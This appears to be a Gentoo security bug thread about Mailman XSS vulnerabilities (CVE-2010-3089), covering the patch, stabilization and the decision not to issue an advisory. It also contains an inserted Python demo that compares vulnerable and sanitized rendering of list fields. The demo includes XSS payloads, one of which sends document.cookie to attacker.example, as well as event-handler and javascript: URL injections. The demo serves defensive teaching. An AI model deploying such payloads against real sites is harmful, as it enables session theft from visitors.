From $URL:
> I plan to release a Mailman 2.1.14 candidate release towards the end of
> next week (Sept 9 or 10). This release will have enhanced XSS defenses
> addressing two recently discovered vulnerabilities. Since release of the
> code will potentially expose the vulnerabilities, I plan to publish a
> patch against the 2.1.13 base with the fix before actually releasing the
> 2.1.14 candidate.

Patch available at: http://mail.python.org/pipermail/mailman-announce/attachments/20100909/c9d893e6/attachment.txt
CVE assignment per http://www.openwall.com/lists/oss-security/2010/09/13/5:
> There are two mailman vulns. fixed by the following patch:
> http://mail.python.org/pipermail/mailman-announce/2010-September/000151.html
>
> Particular Red Hat Bugzilla entries are the following:
>
> https://bugzilla.redhat.com/show_bug.cgi?id=631881 CVE-2010-3089 mailman XSS via list information HTML template
> https://bugzilla.redhat.com/show_bug.cgi?id=631859 CVE-2010-3090 mailman XSS in list information overview
I've committed 2.1.14_rc1. I'm unsure if we want to have an rc version as stabilization target, but I consider it not worth creating another .13 version (which has other issues as well).
CVE-2010-3090 will be rejected per: http://www.openwall.com/lists/oss-security/2010/09/13/12
CVE-2010-3089 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3089): Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field.
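The bug class described above, stored XSS through list-owner-editable fields rendered into the public listinfo page, illustrated as an added example. This is not Mailman's code or its actual fix; it assumes a hypothetical listinfo template with three owner-controlled fields (a plain-text name and description, and an info field that is allowed to carry limited HTML), and the payloads are constructed for the demo, not taken from the advisory. The vulnerable renderer interpolates the stored fields verbatim; the hardened one escapes the plain-text fields on output and passes the HTML-bearing field through a tag/attribute allowlist that also drops event handlers and non-http(s)/mailto URLs.

```python
"""Stored XSS via owner-editable list fields: vulnerable vs. hardened rendering.

Added illustration, not Mailman code. The template, field names and payloads
below are assumptions made for this example.
"""
import html
from html.parser import HTMLParser

# Constructed payloads standing in for what a malicious list owner could save
# through the admin interface (not the advisory's payloads).
EVIL_DESCRIPTION = 'Announce list<script>fetch("https://attacker.example/"+document.cookie)</script>'
EVIL_INFO = '<p onmouseover="alert(1)">Welcome</p><a href="javascript:alert(2)">rules</a>'

# Hypothetical listinfo page template.
TEMPLATE = (
    "<html><body><h1>{name}</h1>\n"
    "<p>{description}</p>\n"
    '<div class="info">{info}</div>\n'
    "</body></html>\n"
)


def render_vulnerable(name, description, info):
    # Owner-controlled strings land in the page verbatim: every visitor of the
    # listinfo page executes whatever the list owner stored.
    return TEMPLATE.format(name=name, description=description, info=info)


ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds an HTML fragment keeping only allowlisted tags/attributes.

    Non-allowlisted tags are dropped (their text is kept, escaped); on*
    handlers, style and similar attributes are dropped; href must use a
    safe scheme. Text nodes are always re-escaped, so nothing executes.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onmouseover=, style=, etc.
            val = (value or "").strip()
            if name == "href" and not val.lower().startswith(SAFE_SCHEMES):
                continue  # drops javascript:, data:, vbscript: URLs
            parts.append('%s="%s"' % (name, html.escape(val, quote=True)))
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        # <br/> style self-closing tags: emit only the start tag.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Covers ordinary text and the body of a dropped <script> element.
        self.out.append(html.escape(data, quote=True))

    def result(self):
        return "".join(self.out)


def sanitize_html(fragment):
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


def render_hardened(name, description, info):
    # Plain-text fields: escape on output. HTML-bearing field: allowlist.
    return TEMPLATE.format(
        name=html.escape(name, quote=True),
        description=html.escape(description, quote=True),
        info=sanitize_html(info),
    )


def page_has_active_content(page):
    """Cheap demo check: does the rendered page still carry something a
    browser would execute?"""
    low = page.lower()
    return "<script" in low or "javascript:" in low or "onmouseover=" in low


if __name__ == "__main__":
    v = render_vulnerable("announce", EVIL_DESCRIPTION, EVIL_INFO)
    h = render_hardened("announce", EVIL_DESCRIPTION, EVIL_INFO)
    print("vulnerable page carries active content:", page_has_active_content(v))
    print("hardened page carries active content:", page_has_active_content(h))
    print(h)
```

Escaping on output is the fix for fields that are supposed to be plain text; it does nothing for a field whose purpose is to hold owner-supplied markup, which is why that field needs an allowlist parser rather than a blocklist of known-bad strings. Note that this only reduces the exposure to what a list owner can do through markup; the advisory's point that the attacker must already be an authenticated list owner is unchanged.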
Hi, Hanno. It looks like 2.1.14 has been released. http://bazaar.launchpad.net/~mailman-coders/mailman/2.1/annotate/head:/NEWS Is it an appropriate stabilization target?
mailman-2.1.14 in tree, please test and stabilize.
amd64 done
x86 stable
sparc stable
ppc done
Thanks, everyone. GLSA Vote: No. This is a stored/persistent XSS but only for authenticated mailing list owners according to https://bugzilla.redhat.com/show_bug.cgi?id=631881.
Agreed, closing noglsa.